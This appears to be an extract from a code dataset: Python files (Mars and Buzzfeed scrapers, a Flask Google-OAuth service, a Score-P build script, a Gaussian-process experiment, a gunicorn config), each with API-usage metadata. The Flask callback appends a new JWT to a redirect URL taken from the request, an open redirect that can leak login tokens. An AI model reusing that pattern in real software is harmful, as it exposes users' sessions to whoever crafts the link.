"line_number": 569, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 575, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 579, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 584, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 586, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 594, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 595, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 600, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 600, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 601, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 605, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 605, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 610, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 610, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 615, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 615, "usage_type": "attribute"}, {"api_name": "streamlit.error", "line_number": 621, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 624, "usage_type": "call"}, {"api_name": "streamlit.sidebar.button", "line_number": 628, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 628, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 629, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 632, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 635, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 643, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 647, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 652, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 654, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 662, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 663, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 667, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 671, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 675, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 675, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 680, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 680, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 685, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 685, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 689, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 689, "usage_type": "attribute"}, {"api_name": "sklearn.svm.SVC", "line_number": 690, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 693, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 695, "usage_type": 
"call"}, {"api_name": "streamlit.error", "line_number": 697, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 703, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 707, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 712, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 714, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 722, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 723, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 725, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 725, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 726, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 732, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 736, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 737, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 755, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.model_selection.learning_curve", "line_number": 758, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 758, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 761, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 761, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 762, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 762, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 763, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 763, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 764, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 764, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 765, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 765, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 768, "usage_type": "call"}]} +{"seq_id": "29057862793", "text": "from bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom splinter import Browser\nimport requests\n\n#define function to intiate \"light\" browser for nav\ndef init_browser():\n executable_path = {'executable_path':'chromedriver.exe'}\n browser = Browser('chrome',**executable_path, headless=False)\n\n return browser\n\n\n#define the scrape function\ndef scrape():\n\n #### Get news title and body ####\n\n # Get page HTML into a Soup\n browser = init_browser()\n url_to_scrape = \"https://redplanetscience.com/\"\n browser.visit(url_to_scrape)\n html = browser.html\n soup = bs(html,'html.parser')\n\n # Get all news items\n news_items = soup.find_all('div', class_='list_text')\n\n news_title = news_items[0].find('div', class_='content_title').text\n news_p = news_items[0].find('div', class_='article_teaser_body').text\n\n #### Get Featured Image ####\n\n # Get page HTML into a Soup\n url = \"https://spaceimages-mars.com/\"\n browser.visit(url)\n html = browser.html\n soup = bs(html,'html.parser')\n #assing source url to 
variable\n featured_image_url = soup.find_all('img', class_='headerimage fade-in')[0][\"src\"]\n\n #### Get Table ####\n\n # Get page HTML into a Soup\n url = \"https://galaxyfacts-mars.com/\"\n tables = pd.read_html(url)\n #scrape to pd.dataframe\n df2 = tables[1]\n #assign column headers\n df2.columns = [\"Mars\", \"Value\"]\n #convert to html\n mars_html_table = df2.to_html()\n\n #### Get Hemispheres ####\n\n # Get page HTML into a Soup\n url = 'https://marshemispheres.com/'\n browser.visit(url)\n html = browser.html\n soup = bs(html, 'html.parser')\n # Get all news items\n hemispheres = soup.find_all('div', class_='item')\n #create empty list to append dictionaries\n hemisphere_image_urls = []\n #loop through each iteration of hemispheres\n for hemisphere in hemispheres:\n\n hemisphere = hemisphere.find('div', class_=\"description\")\n #Get title\n title = hemisphere.h3.text\n #Assign sub-url for page nav\n link = hemisphere.a[\"href\"]\n #navigate\n browser.visit(url + link)\n # Get page HTML into a Soup\n html = browser.html\n soup = bs(html, 'html.parser')\n #Get image url\n image_link = soup.find('div', class_='downloads')\n image_url = image_link.find('li').a[\"href\"]\n #create dictionary to hold values\n image_dict = {}\n #add values\n image_dict['title'] = title\n image_dict['img_url'] = image_url\n #append to list\n hemisphere_image_urls.append(image_dict)\n #trim variable\n hemisphere_images = hemisphere_image_urls\n\n # Store data in dictionary\n mars_dict = {\n \"news_title\": news_title,\n \"news_p\": news_p,\n \"featured_image_url\": featured_image_url,\n \"table\": str(mars_html_table),\n \"hemisphere_images\": hemisphere_images\n }\n\n # Return results\n return mars_dict\n", "repo_name": "Squonk713/Web-Scraping-Challenge", "sub_path": "mars_scrape2.py", "file_name": "mars_scrape2.py", "file_ext": "py", "file_size_in_byte": 3019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "splinter.Browser", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "39135345334", "text": "from flask import url_for, request\nfrom flask_dance.contrib.google import google\nfrom flask_jwt_extended import JWTManager, create_access_token, get_jwt_identity\nfrom flask import session\nfrom os import getenv\nfrom extensions import db\nfrom models.user import User\nfrom models.candidate import Candidate\nfrom models.employer import Employer\nfrom models.job_post import JobPost\n\nclass AuthService:\n\t@staticmethod\n\tdef google_login():\n\t\t# Get `type` query param\n\t\tuser_type = request.args.get('type')\n\t\t# Save user type in session\n\t\tif user_type:\n\t\t\tsession['user_type'] = user_type\n\t\t# Return google login url\n\t\treturn url_for('google.login')\n\n\t@staticmethod\n\tdef google_login_callback():\n\t\ttry:\n\t\t\tif not google.authorized:\n\t\t\t\treturn url_for('google.login')\n\n\t\t\taccount_info = google.get('/oauth2/v2/userinfo')\n\t\t\tif account_info.ok:\n\t\t\t\taccount_info_json = account_info.json()\n\t\t\t\temail = account_info_json['email']\n\t\t\t\t# Check if user is in database\n\t\t\t\tuser = 
User.query.filter_by(email=email).first()\n\t\t\t\tif not user:\n\t\t\t\t\t# Create user \n\t\t\t\t\tname = account_info_json['name']\n\t\t\t\t\t# Split name into first and last name\n\t\t\t\t\tname_split = name.split(' ')\n\t\t\t\t\tfirst_name = name_split[0]\n\t\t\t\t\tlast_name = name_split[-1]\n\t\t\t\t\t# Get user type from session\n\t\t\t\t\tuser_type = session.get('user_type') or None\n\t\t\t\t\tif not user_type:\n\t\t\t\t\t\treturn {'error': 'User type not found'}\n\t\t\t\t\t\n\t\t\t\t\tif user_type == 'candidate':\n\t\t\t\t\t\tuser = Candidate(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telif user_type == 'employer':\n\t\t\t\t\t\tuser = Employer(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn {'error': 'Invalid user type'}\n\t\t\t\t\t# Add user to database\n\t\t\t\t\tdb.session.add(user)\n\t\t\t\t\tdb.session.commit()\n\t\t\t\t# Create JWT token\n\t\t\t\taccess_token = create_access_token(identity=email)\n\t\t\t\t# Return url to frontend with JWT token\n\t\t\t\tredirect_url = request.args.get('redirect_url') or getenv('FRONTEND_URL')\n\t\t\t\treturn f'{redirect_url}?token={access_token}'\n\t\t\telse:\n\t\t\t\treturn {'error': 'Failed to fetch user info'}\n\t\texcept Exception as e:\n\t\t\treturn {'error': str(e)}\n\t\t\n\t@staticmethod\n\tdef user_data():\n\t\ttry:\n\t\t\tuser_email = get_jwt_identity()\n\t\t\tuser = User.query.filter_by(email=user_email).first()\n\t\t\tif user:\n\t\t\t\t# Get company_id from employer model if user is employer\n\t\t\t\tif user.type == 'employer':\n\t\t\t\t\temployer = Employer.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = employer.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\t# Add job posts to data\n\t\t\t\t\tjob_posts = JobPost.query.filter_by(employer_id=user.id).all()\n\t\t\t\t\tdata['job_posts'] = [job_post.serialize() for job_post in job_posts]\n\t\t\t\t\treturn data\n\t\t\t\telif user.type == 'candidate':\n\t\t\t\t\tcandidate = Candidate.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = candidate.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\treturn data\n\t\t\telse:\n\t\t\t\treturn {'error': 'User not found'}\n\t\texcept Exception as e:\n\t\t\tprint('Error', e)\n\t\t\treturn {'error': str(e)}\n\n\t\t", "repo_name": "WaleedAhmed05/GoldenBullets-Soen6011summer2023", "sub_path": "backend/app/services/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 3071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.authorized", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.get", "line_number": 29, "usage_type": "call"}, {"api_name": 
"flask_dance.contrib.google.google", "line_number": 29, "usage_type": "name"}, {"api_name": "models.user.User.query.filter_by", "line_number": 34, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "models.candidate.Candidate", "line_number": 48, "usage_type": "call"}, {"api_name": "models.employer.Employer", "line_number": 54, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 62, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 62, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 62, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 63, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 63, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 63, "usage_type": "name"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 67, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 77, "usage_type": "call"}, {"api_name": "models.user.User.query.filter_by", "line_number": 78, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 78, "usage_type": "name"}, {"api_name": "models.employer.Employer.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.employer.Employer.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.employer.Employer", "line_number": 82, "usage_type": "name"}, {"api_name": "models.job_post.JobPost.query.filter_by", "line_number": 87, "usage_type": "call"}, {"api_name": "models.job_post.JobPost.query", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.job_post.JobPost", "line_number": 87, "usage_type": "name"}, {"api_name": "models.candidate.Candidate.query.filter_by", "line_number": 91, "usage_type": "call"}, {"api_name": "models.candidate.Candidate.query", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.candidate.Candidate", "line_number": 91, "usage_type": "name"}]} +{"seq_id": "39749649765", "text": "import re\nimport setuptools\nimport subprocess\nimport sys\n\nif sys.version_info < (3, 5):\n sys.exit('Python 3.4 or older is not supported.')\n\n\ndef remove_flag3(x):\n return x[3:]\n\nldflags = subprocess.check_output([\"scorep-config\", \"--ldflags\"]).decode('utf-8')\ncflags = subprocess.check_output([\"scorep-config\", \"--cflags\"]).decode('utf-8')\n\nldflags = \" \" + ldflags\ncflags = \" \" + cflags\n\nscorep_include_dir = re.findall(\" -I[/+-@.\\w]*\", cflags)\nscorep_library_dir = re.findall(\" -L[/+-@.\\w]*\", ldflags)\n\nscorep_include_dir = list(map(remove_flag3, scorep_include_dir))[0]\nscorep_library_dir = list(map(remove_flag3, scorep_library_dir))[0]\n\nsetuptools.setup(name='scorep-cli-score',\n version='0.1',\n author='Marcel Achtert',\n 
author_email='marcel.achtert@tu-dresden.de',\n description='A Score-P-score based filter creation tool',\n url='https://github.com/score-p/scorep-score-gui',\n packages=['scorep_cli_score'],\n python_requires='~=3.5',\n scripts=['scorep_cli_score/scorep-cli-score'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: BSD License 2.0',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n ext_modules=[\n setuptools.Extension('bind',\n sources=['scorep_cli_score/bind.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n language='c++'),\n setuptools.Extension('scorep_profile',\n sources=['scorep_cli_score/scorep_profile.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n extra_compile_args=['-std=c++14'],\n language='c++'),\n ])\n", "repo_name": "score-p/scorep_cli_score", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 7, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 13, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 25, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 45, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "7536964330", "text": "from collections import namedtuple\n\nimport GPy\n\nfrom gaussian_processes_variational.num_inducing_dimension_experiments import run_single_experiment\nfrom gaussian_processes_variational.parameter_containers import FixedParameterSettings\nfrom gaussian_processes_variational.simulation import RBFSimulator, LinearSimulator\n\n\ndef main():\n \"\"\"Run experiment for different datasets where a grid of number of inducings points and dimensions is explored.\"\"\"\n Experiment = namedtuple('Experiment', ['tag', 'simulator', 'kernel', 'dimensions', 'num_inducings'])\n n = 801\n inducing_points = [1, 2, 3, 4, 5, 10, 20, 50, 100, 200, 300, 400, n]\n dimensions = [1, 2, 3, 4, 5, 10, 15, 20]\n\n experiments = [\n # Experiment('rbf_fix_covariance', RBFSimulator, GPy.kern.RBF, dimensions, inducing_points),\n Experiment('linear_fix_covariance', LinearSimulator, GPy.kern.Linear, dimensions, inducing_points),\n ]\n opt_settings = FixedParameterSettings(fix_inducing_inputs=True)\n for experiment in experiments:\n run_single_experiment(experiment.tag, experiment.kernel, experiment.simulator, n, experiment.dimensions,\n experiment.num_inducings, opt_settings)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "DAlkemade/gaussian_processes_variational", "sub_path": "experiment_fix_inducing_inputs.py", "file_name": "experiment_fix_inducing_inputs.py", 
"file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.simulation.LinearSimulator", "line_number": 19, "usage_type": "argument"}, {"api_name": "GPy.kern", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gaussian_processes_variational.parameter_containers.FixedParameterSettings", "line_number": 21, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.num_inducing_dimension_experiments.run_single_experiment", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "7988456665", "text": "access_logfile = '-'\nerror_logfile = '-'\ngraceful_timeout = 60\nlog_file = '-'\nlog_level = 'info'\nlogger_class = 'safe_transaction_service.history.utils.CustomGunicornLogger'\ntimeout = 60\nworker_class = 'gevent'\nworker_connections = 2000\n\n\ndef post_fork(server, worker):\n try:\n from psycogreen.gevent import patch_psycopg\n patch_psycopg()\n worker.log.info(\"Made Psycopg2 Green\")\n except ImportError:\n worker.log.info(\"Psycopg2 not patched\")\n", "repo_name": "bigman1208000/safe-transaction-service", "sub_path": "gunicorn.conf.py", "file_name": "gunicorn.conf.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycogreen.gevent.patch_psycopg", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "72491990887", "text": "import os\nimport json\nimport datetime\nimport time\nimport argparse\n\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom newspaper import Article\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\n\nparser = argparse.ArgumentParser(\n description='A web scraper for Buzzfeed articles.')\n\nrequiredNamed = parser.add_argument_group('required arguments')\nrequiredNamed.add_argument('-q', '--query', type=str, required=True,\n help=\"Query string\")\n\nparser.add_argument('-l', '--link_file', type=str, default=\"\",\n help=\"Path to a newline-delimited file of article links \"\n \"to scrape\")\nparser.add_argument('-r', '--date_range', type=str, default=\"\",\n help=\"A space separated string of dates of the form \"\n \"'mm/dd/yyyy mm/dd/yyyy'. 
If this argument is not \"\n \"supplied, the scraper will default to searching \"\n \"Buzzfeed's recently tagged articles.\")\n\nparser.add_argument('--sleep_time', type=int, default=5,\n help=\"Time (in seconds) to wait between queries\")\nparser.add_argument('--page_timeout', type=int, default=30,\n help=\"Time (in seconds) after which we stop trying to load \"\n \"a page and retry\")\n\ndef parse_args(parser):\n args = parser.parse_args()\n QUERY = args.query\n QUERY = QUERY.replace(' ', '+')\n\n SLEEP_TIME = args.sleep_time\n PAGE_LOAD_TIMEOUT = args.page_timeout\n\n LINKS_FROM_FILE = False\n if len(args.link_file) > 0:\n LINKS_FROM_FILE = args.link_file\n\n dr = args.date_range\n if len(dr) > 0:\n FROM_LAST = dr.split(' ')\n else:\n FROM_LAST = None\n return QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, FROM_LAST\n\n\ndef render(query_url):\n browser = webdriver.PhantomJS()\n browser.set_window_size(1120, 550)\n\n browser.implicitly_wait(PAGE_LOAD_TIMEOUT)\n browser.set_page_load_timeout(PAGE_LOAD_TIMEOUT)\n\n try:\n browser.get(query_url)\n html_source = browser.page_source\n browser.quit()\n return html_source\n\n except TimeoutException:\n print(\"\\t\\tRetrying page load after {}s timeout\".format(PAGE_LOAD_TIMEOUT))\n return render(query_url)\n\n\ndef gen_query_url(page_num=1):\n base_url = \"https://www.buzzfeed.com/tag\"\n content = \"{}?p={}\".format(QUERY, page_num)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed(query_url):\n result = render(query_url)\n soup = BeautifulSoup(result)\n return soup\n\n\ndef get_article_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"article\")\n article_links = [hit.findAll(\"a\")[0].attrs['href'] for hit in hits]\n article_links = [base + link for link in article_links]\n return article_links\n\n\ndef get_archive_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"ul\", class_=\"flow\")\n link_data = [(a.attrs['title'], a.contents[0], a.attrs['href']) for a in\n hits[0].findAll(\"a\")]\n\n links = []\n for lede, title, link in link_data:\n if QUERY.replace(\"+\", \" \").lower() in lede.lower():\n links.append(link)\n elif QUERY.replace(\"+\", \" \").lower() in title.lower():\n links.append(link)\n\n archive_links = [base + link for link in links]\n return archive_links\n\n\ndef date_range(start_date, end_date):\n for n in range(int((end_date - start_date).days) + 1):\n yield start_date + datetime.timedelta(n)\n\n\ndef gen_archive_url(yy, mm, dd):\n base_url = \"https://www.buzzfeed.com/archive/\"\n content = \"{}/{}/{}\".format(yy, mm, dd)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed_archive():\n from_month, from_day, from_year = [int(i) for i in FROM_LAST[0].split('/')]\n to_month, to_day, to_year = [int(i) for i in FROM_LAST[1].split('/')]\n\n start_date = datetime.date(from_year, from_month, from_day)\n end_date = datetime.date(to_year, to_month, to_day)\n\n dates = []\n for date in date_range(start_date, end_date):\n dates.append([int(i) for i in date.strftime(\"%Y-%m-%d\").split('-')])\n\n links = []\n links_fp = './links/buzzfeed_links_{}_{}-{}.txt'\\\n .format(QUERY,\n datetime.datetime.strftime(start_date, \"%m%d%y\"),\n datetime.datetime.strftime(end_date, \"%m%d%y\"))\n\n for year, month, day in dates:\n archive_url = gen_archive_url(year, month, day)\n\n time.sleep(SLEEP_TIME)\n soup = search_buzzfeed(archive_url)\n new_links = get_archive_links(soup)\n\n print(\"\\tFound {} article links 
for archive date {}\"\n .format(len(new_links), \"{}/{}/{}\".format(month, day, year)))\n links += new_links\n\n with open(links_fp, 'a') as handle:\n handle.write('\\n'.join(new_links) + \"\\n\")\n return set(links)\n\n\ndef collect_links():\n links = []\n links_fp = './links/buzzfeed_links_{}.txt'.format(QUERY)\n\n if not os.path.exists(\"./links\"):\n os.makedirs(\"./links\")\n\n # if user passes a date range, we have to search the buzzfeed\n # archives rather than running a search query\n if isinstance(FROM_LAST, list):\n return search_buzzfeed_archive()\n\n prev_page_empty = False\n for idx in range(*PAGE_RANGE):\n query_url = gen_query_url(idx)\n\n time.sleep(SLEEP_TIME)\n soup = search_buzzfeed(query_url)\n new_links = get_article_links(soup)\n\n print(\"\\tFound {} article links on page {} of query results\"\n .format(len(new_links), idx))\n links += new_links\n\n # the most recent 2 pages are empty, we have run out of query pages!\n if len(new_links) == 0:\n if prev_page_empty:\n return set(links)\n else:\n prev_page_empty = True\n else:\n prev_page_empty = False\n with open(links_fp, 'a') as handle:\n handle.write('\\n'.join(new_links) + \"\\n\")\n\n return set(links)\n\n\ndef construct_article(link):\n article = {\"url\": link}\n\n article_obj = Article(url=link, language='en')\n article_obj.download()\n article_obj.parse()\n\n authors = article_obj.authors\n article['text'] = article_obj.text\n article['title'] = article_obj.title\n article['author'] = authors if len(authors) != 0 else None\n article['urlToImage'] = None\n article['description'] = article_obj.summary\n\n article['publishedAt'] = None\n article['before_election'] = None\n\n if article_obj.publish_date:\n date = tz.localize(article_obj.publish_date)\n article['publishedAt'] = date.isoformat()\n article['before_election'] = True if date < ELECTION_DATE else False\n return article\n\n\ndef scrape_articles():\n articles, links = [], []\n\n print('\\n####### Buzzfeed Scraper #######')\n print('Running query:')\n if not FROM_LAST:\n print('Scraping recent pages with the tag \"{}\"\\n'.format(QUERY))\n else:\n print('Scraping pages which contain \"{}\" from archives between '\n '{} and {}\\n'.format(QUERY, *args.date_range.split(' ')))\n\n if not LINKS_FROM_FILE:\n links = collect_links()\n else:\n with open(LINKS_FROM_FILE, 'r') as handle:\n for line in handle:\n links.append(line.strip())\n\n links = [i.strip() for i in set(links) if i.strip() != '']\n print('\\nCollected {} links'.format(len(links)))\n\n for idx, link in enumerate(links):\n print('\\t{}. 
Scraping {}'.format(idx + 1, link))\n time.sleep(SLEEP_TIME) # for throttling\n article = construct_article(link)\n articles.append(article)\n\n data = {'articles': articles,\n 'source': 'buzzfeed',\n 'status': \"ok\",\n 'query': QUERY,\n 'from_last': None,\n 'pagerange': PAGE_RANGE}\n return data\n\n\ndef today():\n return datetime.datetime.strftime(datetime.datetime.now(), \"%m%d%y\")\n\n\ndef save_json(data, save_fp):\n if not os.path.exists(\"./scraped_json\"):\n os.makedirs(\"./scraped_json\")\n\n with open(save_fp, 'w') as handle:\n json.dump(data, handle, indent=4,\n sort_keys=True, separators=(',', ':'))\n\n\ndef main():\n date = today()\n data = scrape_articles()\n n = len(data['articles'])\n\n save_fp = \"./scraped_json/{}_{}_{}.json\".format('buzzfeed', date, n)\n print('Saving scraped articles to {}'.format(save_fp))\n save_json(data, save_fp)\n\n\nif __name__ == \"__main__\":\n tz = pytz.utc\n PAGE_RANGE = [1, 1000]\n ELECTION_DATE = datetime.datetime(2016, 11, 9, 11, tzinfo=tz)\n QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, \\\n FROM_LAST = parse_args(parser)\n\n main()\n", "repo_name": "ddbourgin/news-scrapers", "sub_path": "buzzfeed.py", "file_name": "buzzfeed.py", "file_ext": "py", "file_size_in_byte": 8793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 115, 